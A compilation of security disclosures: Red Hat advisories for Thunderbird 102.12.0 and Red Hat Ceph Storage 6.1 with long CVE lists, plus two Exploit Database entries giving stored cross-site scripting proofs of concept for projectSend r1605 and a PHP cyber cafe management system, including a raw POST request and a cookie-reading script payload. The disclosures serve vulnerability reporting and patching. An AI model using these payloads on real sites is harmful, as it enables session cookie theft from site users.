Red Hat Security Advisory 2023-3564-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.12.0.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2023:3564-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3564  
Issue date:        2023-06-12  
CVE Names:         CVE-2023-34414 CVE-2023-34416   
=====================================================================

1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 8.1  
Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream E4S (v. 8.1) - ppc64le, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.12.0.

Security Fix(es):

* Mozilla: Click-jacking certificate exceptions through rendering lag  
(CVE-2023-34414)

* Mozilla: Memory safety bugs fixed in Firefox 114 and Firefox ESR 102.12  
(CVE-2023-34416)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2212841 - CVE-2023-34414 Mozilla: Click-jacking certificate exceptions through rendering lag  
2212842 - CVE-2023-34416 Mozilla: Memory safety bugs fixed in Firefox 114 and Firefox ESR 102.12

6. Package List:

Red Hat Enterprise Linux AppStream E4S (v. 8.1):

Source:  
thunderbird-102.12.0-1.el8_1.src.rpm

ppc64le:  
thunderbird-102.12.0-1.el8_1.ppc64le.rpm  
thunderbird-debuginfo-102.12.0-1.el8_1.ppc64le.rpm  
thunderbird-debugsource-102.12.0-1.el8_1.ppc64le.rpm

x86_64:  
thunderbird-102.12.0-1.el8_1.x86_64.rpm  
thunderbird-debuginfo-102.12.0-1.el8_1.x86_64.rpm  
thunderbird-debugsource-102.12.0-1.el8_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-34414  
https://access.redhat.com/security/cve/CVE-2023-34416  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZIlEkdzjgjWX9erEAQh2LQ/9ExmysHlF6ZaYlOozLC2neD48CLJINWUp  
A/1uMaP4Cxf4Lb5rjZgSo0kcJPborjnnzKnMeTGlD3WovGxKqVP5zz1Ez0dbIm7i  
TvFtXDtRrAXMUXmvJy2BYiN2JN7/HnOKxdTce7d0dTmBtOW/PnPF2lfC69XL5f1k  
du7Bdq/rC3913OUo3zFMmQwcS3035zZITvXTAUk26eW2cnF3gJbLOlMfO7crbvfJ  
fympJ/w2llpG4h1AzHc1OpVYyObneL9T6b1PFTx6xJMmkCrWhh3iiXKBpj+b5WXW  
FBx/k2usAjvS6S0GEC3rl6dQBtvKjekpfiDuQiaj/lyLMBt4K/RHl36S83/wpRGA  
Tvn2v9cw/FLXQefOCWRtkkUuMxgdQpRSxMWAM+zNCk6Y0Y5SAbZr1k7xJXcPQlI+  
8jzJ4nIP2i6oaDpIFcD3tDLWsxDg/1WOHyqfetQPTgAi5KNe7lRpHTdbXTDf483b  
UlEUrtnIPPHExXuu91bBcZWYEJKKDyFTUK4iHbk/raAh0p4qHI4kd+rjmR0zlfW7  
zkWVZow/F/P//S0d7XhLbwnU6lVHU5DzpLNnGIzRnrjcFJsoRJQP6Vs6sJNhH/IW  
4SQaIRRAJo694SIUf+aOJdoQrmklfFcG23otVJ6IthQXOCj7sPpc085znS7hBeVx  
gVZZeq1j/Pw=  
=4cSm  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3564-01

projectSend version r1605 suffers from a persistent cross site scripting vulnerability.

    Exploit Title: projectSend r1605 - Stored XSSApplication: projectSendVersion: r1605Bugs:  Stored XssTechnology: PHPVendor URL: https://www.projectsend.org/Software Link: https://www.projectsend.org/Date of found: 11-06-2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================1. Login as admin2. Go to Custom Html/Css/Js (http://localhost/custom-assets.php)3. Go to new JS (http://localhost/custom-assets-add.php?language=js)4. Set content as  alert("xss"); and set public 5. And Save6. Go to http://localhost (logout)payload: alert("xss")POST /custom-assets-add.php HTTP/1.1Host: localhostContent-Length: 171Cache-Control: max-age=0sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/custom-assets-add.php?language=jsAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: log_download_started=false; PHPSESSID=7j8g8u9t7khb259ci4fvareg2lConnection: closecsrf_token=222b49c5c4a1755c451637f17ef3e7ea8bb5b6ee616293bd73d15d0e608d9dab&language=js&title=test&content=alert%28%22XSS%22%29%3B&enabled=on&location=public&position=head

projectSend r1605 Cross Site Scripting

Cross-site scripting (XSS) vulnerability in Phpgurukul Cyber Cafe Management System 1.0 allows remote attackers to inject arbitrary web script or HTML via the admin username parameter.

    # Exploit Title: Cyber Cafe Management System  Project (CCMS) 1.0 - Persistent Cross-Site Scripting
    # Date: 04-12-2020
    # Exploit Author: Pruthvi Nekkanti
    # Vendor Homepage: https://phpgurukul.com
    # Product link: https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql/
    # Version: 1.0
    # Tested on: Kali Linux
    
    Attack vector:
    This vulnerability can results attacker to inject the XSS payload in admin username and each time any user will visits the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload.
    
    Vulnerable Parameters: Admin Username.
    
    Steps-To-Reproduce:
    1. Go to the Product admin panel change the admin username
    2. Put this payload in admin username field:"><script>alert(document.cookie)</script>
    3. Now go to the website and the XSS will be triggered.

CVE-2023-34666: OffSec’s Exploit Database Archive

A new container image for Red Hat Ceph Storage 6.1 is now available in the Red Hat Ecosystem Catalog.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2021-42581: A flaw was found in the Ramda NPM package that involves prototype poisoning. This flaw allows attackers to supply a crafted object, affecting the integrity or availability of the application.
* CVE-2022-1650: A flaw was found in the EventSource NPM Package. The description from the source states the following message: "Exposure of Sensitive Information to an Unauthorized Actor." This flaw allows an attacker to steal the user's credentials and then use the credentials to access the legitimate website.
* CVE-2022-1705: A flaw was found in golang. The HTTP/1 client accepted invalid Transfer-Encoding headers indicating "chunked" encoding. This issue could allow request smuggling, but only if combined with an intermediate server that also improperly accepts the header as invalid.
* CVE-2022-2880: A flaw was found in the golang package, where requests forwarded by reverse proxy include the raw query parameters from the inbound request, including unparseable parameters rejected by net/http. This issue could permit query parameter smuggling when a Go proxy forwards a parameter with an unparseable value. After the fix, the reverse proxy sanitizes the query parameters in the forwarded query when the outbound request's form field is set after the reverse proxy. The director function returns, indicating that the proxy has parsed the query parameters. Proxies that do not parse query parameters continue to forward the original query parameters unchanged.
* CVE-2022-21680: A vulnerability was found in the markedjs package. Affected versions of this package are vulnerable to Regular expression Denial of Service (ReDoS) attacks, affecting system availability.
* CVE-2022-21681: A vulnerability was found in the markedjs package. Affected versions of this package are vulnerable to Regular expression Denial of Service (ReDoS) attacks, affecting system availability.
* CVE-2022-24675: A buffer overflow flaw was found in Golang's library encoding/pem. This flaw allows an attacker to use a large PEM input (more than 5 MB), causing a stack overflow in Decode, which leads to a loss of availability.
* CVE-2022-24785: A path traversal vulnerability was found in Moment.js that impacts npm (server) users. This issue occurs if a user-provided locale string is directly used to switch moment locale, which an attacker can exploit to change the correct path to one of their choice. This can result in a loss of integrity.
* CVE-2022-26148: A flaw was found in Grafana when integrated with Zabbix. The Zabbix password can be found in the api_jsonrpc.php HTML source code. When the user logs in and allows the user to register, one can right-click to view the source code and use Ctrl-F to search for the password in api_jsonrpc.php to discover the Zabbix account password and URL address.
* CVE-2022-27664: A flaw was found in the golang package. In net/http in Go, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if a fatal error preempts the shutdown.
* CVE-2022-28131: A flaw was found in golang encoding/xml. When calling Decoder, Skip while parsing a deeply nested XML document, a panic can occur due to stack exhaustion and allows an attacker to impact system availability.
* CVE-2022-28327: An integer overflow flaw was found in Golang's crypto/elliptic library. This flaw allows an attacker to use a crafted scaler input longer than 32 bytes, causing P256().ScalarMult or P256().ScalarBaseMult to panic, leading to a loss of availability.
* CVE-2022-29526: A flaw was found in the syscall.Faccessat function when calling a process by checking the group. This flaw allows an attacker to check the process group permissions rather than a member of the file's group, affecting system availability.
* CVE-2022-30629: A flaw was found in the crypto/tls golang package. When session tickets are generated by crypto/tls, it is missing the ticket expiration. This issue may allow an attacker to observe the TLS handshakes to correlate successive connections during session resumption.
* CVE-2022-30630: A flaw was found in the golang standard library, io/fs. Calling Glob on a path that contains a large number of path separators can cause a panic issue due to stack exhaustion. This could allow an attacker to impact availability.
* CVE-2022-30631: A flaw was found in golang. Calling the Reader, Read method on an archive that contains a large number of concatenated 0-length compressed files can cause a panic issue due to stack exhaustion.
* CVE-2022-30632: A flaw was found in golang. Calling Glob on a path that contains a large number of path separators can cause a panic issue due to stack exhaustion. This can cause an attacker to impact availability.
* CVE-2022-30633: A flaw was found in golang. Calling Unmarshal on an XML document into a Go struct, which has a nested field that uses the "any" field tag, can cause a panic due to stack exhaustion.
* CVE-2022-30635: A flaw was found in golang. When calling Decoder, Decode on a message that contains deeply nested structures, a panic can occur due to stack exhaustion and allows an attacker to impact system availability.
* CVE-2022-31097: A Cross-site scripting (XSS) vulnerability was found in the Unified Alerting feature of Grafana. This stored XSS can elevate privileges from Editor to Admin.
* CVE-2022-31107: A flaw was found in Grafana. This flaw allows a malicious user with the authorization to log into a Grafana instance via a configured OAuth IdP to take over an existing Grafana account under certain conditions.
* CVE-2022-31123: A flaw was found in the Grafana web application, where it is possible to install plugins which are not digitally signed. An admin could install unsigned plugins, which may contain malicious code.
* CVE-2022-31130: A flaw was found in Grafana's use of the GitLab data source plugin, leaking the API key to gitlab. This can result in the destination plugin receiving a Grafana user's authentication token, which could be used by an attacker.
* CVE-2022-32148: A flaw was found in net/http/httputil golang package. When httputil.ReverseProxy.ServeHTTP is called with a Request.Header map containing a nil value for the X-Forwarded-For header, ReverseProxy could set the client IP incorrectly. This issue may affect confidentiality.
* CVE-2022-32189: An uncontrolled resource consumption flaw was found in Golang math/big. A too-short encoded message can cause a panic in Float.GobDecode and Rat.GobDecode in math/big in Go, potentially allowing an attacker to create a denial of service, impacting availability.
* CVE-2022-32190: A flaw was found in the golang package. The JoinPath doesn't remove the ../ path components appended to a domain that is not terminated by a slash, possibly leading to a directory traversal attack.
* CVE-2022-35957: A flaw was found in the grafana package. Auth proxy allows authentication of a user by only providing the username (or email) in an X-WEBAUTH-USER HTTP header. The trust assumption is that a front proxy will take care of authentication and that the Grafana server is only publicly reachable with this front proxy.
* CVE-2022-39201: A flaw was found in Grafana. The vulnerability impacts data source and plugin proxy endpoints under certain conditions. Grafana could leak the authentication cookie of users to plugins, which could result in an impact to confidentiality, integrity, and availability.
* CVE-2022-39229: A flaw was found in the Grafana web application. When a user logs into the system, either the username or email address can be used. However, the login system allows both a username and connected email to be registered, which could allow an attacker to prevent a user which has an associated email address access.
* CVE-2022-39306: An authentication bypass flaw was discovered in Grafana. This issue could allow a remote unauthenticated attacker to create an account and provide access to a certain organization, which can be exploited by gaining access to the signup link. The highest impacts to the system are confidentiality and integrity.
* CVE-2022-39307: An information leak was discovered in Grafana. Remote unauthenticated users could exploit the forget password feature to discover which user accounts exist.
* CVE-2022-39324: A flaw was found in the grafana package. While creating a snapshot, an attacker may manipulate a hidden HTTP parameter to inject a malicious URL in the "Open original dashboard" button.
* CVE-2022-41715: A flaw was found in the golang package, where programs that compile regular expressions from untrusted sources are vulnerable to memory exhaustion or a denial of service. The parsed regexp representation is linear in the input size. Still, in some cases, the constant factor can be as high as 40,000, making a relatively small regexp consume larger amounts of memory. After the fix, each regexp being parsed is limited to a 256 MB memory footprint. Regular expressions whose representation would use more space than that are rejected. Routine use of regular expressions is unaffected.
* CVE-2022-41912: An authentication bypass flaw was discovered in the crewjam/saml go package. A remote unauthenticated attacker could trigger it by sending a SAML request. This would allow an escalation of privileges and then enable  compromising system integrity.


Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   Red Hat CodeReady Workspaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat OpenShift Data Foundation

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Quarkus

**Integration and Automation**

All Products

Issued:

2023-06-15

Updated:

2023-06-15

**RHSA-2023:3642 - Security Advisory**

*   Overview
*   Updated Images

**Synopsis**

Important: Red Hat Ceph Storage 6.1 Container security and bug fix update

**Type/Severity**

Security Advisory: Important

**Topic**

A new container image for Red Hat Ceph Storage 6.1 is now available in the Red Hat Ecosystem Catalog.  

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**Description**

Red Hat Ceph Storage is a scalable, open, software-defined storage platform that combines the most stable version of the Ceph storage system with a Ceph management platform, deployment utilities, and support services.  

This new container image is based on Red Hat Ceph Storage 6.1 and Red Hat Enterprise Linux 9.  

Security Fix(es):  

*   crewjam/saml: Authentication bypass when processing SAML responses containing multiple Assertion elements (CVE-2022-41912)
*   eventsource: Exposure of Sensitive Information (CVE-2022-1650)
*   grafana: stored XSS vulnerability (CVE-2022-31097)
*   grafana: OAuth account takeover (CVE-2022-31107)
*   ramda: prototype poisoning (CVE-2021-42581)
*   golang: net/http: improper sanitization of Transfer-Encoding header (CVE-2022-1705)
*   golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters (CVE-2022-2880)
*   marked: regular expression block.def may lead Denial of Service (CVE-2022-21680)
*   marked: regular expression inline.reflinkSearch may lead Denial of Service (CVE-2022-21681)
*   golang: encoding/pem: fix stack overflow in Decode (CVE-2022-24675)
*   Moment.js: Path traversal in moment.locale (CVE-2022-24785)
*   grafana: An information leak issue was discovered in Grafana through 7.3.4, when integrated with Zabbix (CVE-2022-26148)
*   golang: net/http: handle server errors after sending GOAWAY (CVE-2022-27664)
*   golang: encoding/xml: stack exhaustion in Decoder.Skip (CVE-2022-28131)
*   golang: crypto/elliptic: panic caused by oversized scalar (CVE-2022-28327)
*   golang: syscall: faccessat checks wrong group (CVE-2022-29526)
*   golang: io/fs: stack exhaustion in Glob (CVE-2022-30630)
*   golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)
*   golang: path/filepath: stack exhaustion in Glob (CVE-2022-30632)
*   golang: encoding/xml: stack exhaustion in Unmarshal (CVE-2022-30633)
*   golang: encoding/gob: stack exhaustion in Decoder.Decode (CVE-2022-30635)
*   grafana: plugin signature bypass (CVE-2022-31123)
*   grafana: data source and plugin proxy endpoints leaking authentication tokens to some destination plugins (CVE-2022-31130)
*   golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working (CVE-2022-32148)
*   golang: net/url: JoinPath does not strip relative path components in all circumstances (CVE-2022-32190)
*   grafana: Escalation from admin to server admin when auth proxy is used (CVE-2022-35957)
*   grafana: Data source and plugin proxy endpoints could leak the authentication cookie to some destination plugins (CVE-2022-39201)
*   grafana: using email as a username can block other users from signing in (CVE-2022-39229)
*   grafana: email addresses and usernames cannot be trusted (CVE-2022-39306)
*   grafana: User enumeration via forget password (CVE-2022-39307)
*   grafana: Spoofing of the originalUrl parameter of snapshots (CVE-2022-39324)
*   golang: regexp/syntax: limit memory used by parsing regexps (CVE-2022-41715)
*   golang: crypto/tls: session tickets lack random ticket\_age\_add (CVE-2022-30629)
*   golang: math/big: decoding big.Float and big.Rat types can panic if the encoded message is too short, potentially allowing a denial of service (CVE-2022-32189)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.  

Space precludes documenting all of these changes in this advisory. Users are directed to the Red Hat Ceph Storage Release Notes for information on the most significant of these changes:  

https://access.redhat.com/documentation/en-us/red\_hat\_ceph\_storage/6.1/html/release\_notes/index

All users of Red Hat Ceph Storage are advised to pull these new images from the Red Hat Ecosystem catalog, which provides numerous enhancements and bug fixes.

**Affected Products**

*   Red Hat Enterprise Linux for x86\_64 9 x86\_64
*   Red Hat Enterprise Linux for IBM z Systems 9 s390x
*   Red Hat Enterprise Linux for Power, little endian 9 ppc64le

**Fixes**

*   BZ - 2066563 - CVE-2022-26148 grafana: An information leak issue was discovered in Grafana through 7.3.4, when integrated with Zabbix
*   BZ - 2072009 - CVE-2022-24785 Moment.js: Path traversal in moment.locale
*   BZ - 2077688 - CVE-2022-24675 golang: encoding/pem: fix stack overflow in Decode
*   BZ - 2077689 - CVE-2022-28327 golang: crypto/elliptic: panic caused by oversized scalar
*   BZ - 2082705 - CVE-2022-21680 marked: regular expression block.def may lead Denial of Service
*   BZ - 2082706 - CVE-2022-21681 marked: regular expression inline.reflinkSearch may lead Denial of Service
*   BZ - 2083778 - CVE-2021-42581 ramda: prototype poisoning
*   BZ - 2084085 - CVE-2022-29526 golang: syscall: faccessat checks wrong group
*   BZ - 2085307 - CVE-2022-1650 eventsource: Exposure of Sensitive Information
*   BZ - 2092793 - CVE-2022-30629 golang: crypto/tls: session tickets lack random ticket\_age\_add
*   BZ - 2104365 - CVE-2022-31097 grafana: stored XSS vulnerability
*   BZ - 2104367 - CVE-2022-31107 grafana: OAuth account takeover
*   BZ - 2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read
*   BZ - 2107371 - CVE-2022-30630 golang: io/fs: stack exhaustion in Glob
*   BZ - 2107374 - CVE-2022-1705 golang: net/http: improper sanitization of Transfer-Encoding header
*   BZ - 2107383 - CVE-2022-32148 golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working
*   BZ - 2107386 - CVE-2022-30632 golang: path/filepath: stack exhaustion in Glob
*   BZ - 2107388 - CVE-2022-30635 golang: encoding/gob: stack exhaustion in Decoder.Decode
*   BZ - 2107390 - CVE-2022-28131 golang: encoding/xml: stack exhaustion in Decoder.Skip
*   BZ - 2107392 - CVE-2022-30633 golang: encoding/xml: stack exhaustion in Unmarshal
*   BZ - 2113814 - CVE-2022-32189 golang: math/big: decoding big.Float and big.Rat types can panic if the encoded message is too short, potentially allowing a denial of service
*   BZ - 2124668 - CVE-2022-32190 golang: net/url: JoinPath does not strip relative path components in all circumstances
*   BZ - 2124669 - CVE-2022-27664 golang: net/http: handle server errors after sending GOAWAY
*   BZ - 2125514 - CVE-2022-35957 grafana: Escalation from admin to server admin when auth proxy is used
*   BZ - 2131146 - CVE-2022-31130 grafana: data source and plugin proxy endpoints leaking authentication tokens to some destination plugins
*   BZ - 2131147 - CVE-2022-31123 grafana: plugin signature bypass
*   BZ - 2131148 - CVE-2022-39201 grafana: Data source and plugin proxy endpoints could leak the authentication cookie to some destination plugins
*   BZ - 2131149 - CVE-2022-39229 grafana: using email as a username can block other users from signing in
*   BZ - 2132868 - CVE-2022-2880 golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters
*   BZ - 2132872 - CVE-2022-41715 golang: regexp/syntax: limit memory used by parsing regexps
*   BZ - 2138014 - CVE-2022-39306 grafana: email addresses and usernames cannot be trusted
*   BZ - 2138015 - CVE-2022-39307 grafana: User enumeration via forget password
*   BZ - 2148252 - CVE-2022-39324 grafana: Spoofing of the originalUrl parameter of snapshots
*   BZ - 2149181 - CVE-2022-41912 crewjam/saml: Authentication bypass when processing SAML responses containing multiple Assertion elements
*   BZ - 2168965 - \[cee/sd\]\[rook-ceph\]cephfs-top utility is not available under rook-ceph-oprator/tools pod
*   BZ - 2174461 - add dbus-daemon binary - required for NFS in ODF 4.13
*   BZ - 2174462 - add ceph-exporter pkg to RHCS 6.1 image
*   BZ - 2186142 - \[RHCS 6.1\] \[Deployment\] Cephadm bootstrap failing with default image.

**CVEs**

*   CVE-2021-42581
*   CVE-2022-1650
*   CVE-2022-1705
*   CVE-2022-2880
*   CVE-2022-21680
*   CVE-2022-21681
*   CVE-2022-24675
*   CVE-2022-24785
*   CVE-2022-26148
*   CVE-2022-27664
*   CVE-2022-28131
*   CVE-2022-28327
*   CVE-2022-29526
*   CVE-2022-30629
*   CVE-2022-30630
*   CVE-2022-30631
*   CVE-2022-30632
*   CVE-2022-30633
*   CVE-2022-30635
*   CVE-2022-31097
*   CVE-2022-31107
*   CVE-2022-31123
*   CVE-2022-31130
*   CVE-2022-32148
*   CVE-2022-32189
*   CVE-2022-32190
*   CVE-2022-35957
*   CVE-2022-39201
*   CVE-2022-39229
*   CVE-2022-39306
*   CVE-2022-39307
*   CVE-2022-39324
*   CVE-2022-41715
*   CVE-2022-41912

**References**

*   https://access.redhat.com/security/updates/classification/#important
*   https://access.redhat.com/documentation/en-us/red\_hat\_ceph\_storage/6.1/html/release\_notes/index

**ppc64le**

rhceph/keepalived-rhel9@sha256:36abd2b22ebabea813c5afde35b0b80a200056f811267e89f0270da9155b1a22

rhceph/rhceph-6-dashboard-rhel9@sha256:50329da263e8ef00c47632156761621bac30fead5e574ef23cd1d30b7af0019a

rhceph/rhceph-6-rhel9@sha256:9b477366f861df49b533d95941b9770b032827bb4a259c5f86abce8705960c05

rhceph/rhceph-haproxy-rhel9@sha256:8cc4a146d7be5046b416fe9c04d77b4f0a25a2ab7180fdbf8c46cff8e2483080

rhceph/rhceph-promtail-rhel9@sha256:f52fd8d5fbfdcc202c5e31096119377a8b87f9efd31602398d45cec86ec35940

rhceph/snmp-notifier-rhel9@sha256:8887234fbbaddf620eaa7b0f4b1ed6ab8aa5bc52e019e67179554ccd03fba676

**s390x**

rhceph/keepalived-rhel9@sha256:2ae4274163155d880cbd41d1a197d6856f326501a50e028ff3de9ff8a85b3e97

rhceph/rhceph-6-dashboard-rhel9@sha256:3fb7480f9d68333e168eae0c9fbeceb0df7962a40c25ecced81ea4c4959b2c25

rhceph/rhceph-6-rhel9@sha256:72bd6eb932a368af10d5c607d8b60e0fe8b87862f4adaa17fd022a3427a46ca8

rhceph/rhceph-haproxy-rhel9@sha256:e4da2c9d53159d43c6795151eb3c9dea373da19b34d76094b60e7a2466415d62

rhceph/rhceph-promtail-rhel9@sha256:44697ad0d15d1f37b98243f5f013cb9271d70e2b10ab52093a1d7e3409a674b2

rhceph/snmp-notifier-rhel9@sha256:df7c89608fe8352d445efcc1017521b35878cfe61a8b9fd91fab24c00786b2bf

**x86\_64**

rhceph/keepalived-rhel9@sha256:b21d882fd2d08d6f162dbb63e0626d9d6aa892a677c5a28edc97b84feef1655a

rhceph/rhceph-6-dashboard-rhel9@sha256:1d7ca201b778e6a6cb559129e240233b6b6461399c67f979c07d5fe288c400f6

rhceph/rhceph-6-rhel9@sha256:953630d9f9924f17ab7ce168772c3facbaf6866b79a1cf0fb9aee1dcf6eb8c7d

rhceph/rhceph-haproxy-rhel9@sha256:720b3207087d4feb8ab59ffd0b70d6bc22fa21d53b62393779dfaf8972a32e60

rhceph/rhceph-promtail-rhel9@sha256:b46c0196fab3bd3a60b64a1d7ff8af6fbc7c3e526618da1cc78032bffa3be171

rhceph/snmp-notifier-rhel9@sha256:9078b49846d8ec681bec5b96f0d4087b4c66bdc6baf4701cfc9c8e8aeae89661

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

Tag

#linux